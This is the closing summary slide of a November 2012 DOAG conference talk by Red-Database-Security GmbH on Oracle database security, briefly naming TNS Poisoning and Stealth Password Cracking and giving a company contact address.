65

November 2012

• DOAG 2012

Summary

! Annus Horibilis for Oracle (Java, MySQL, Oracle)

! Easy SQL Injection bugs in PL/SQL are nearly gone. Researcher are looking for more complicated bugs.

! Critical bugs are not fixed only workaround are available

! Nearly all databases (TNS Poisoning) or 11g databases (Stealth Password Cracking) are affected.

Thank you! Contact:

Red-Database-Security GmbH

Bliesstr. 16

D-.66538 Neunkirchen

Germany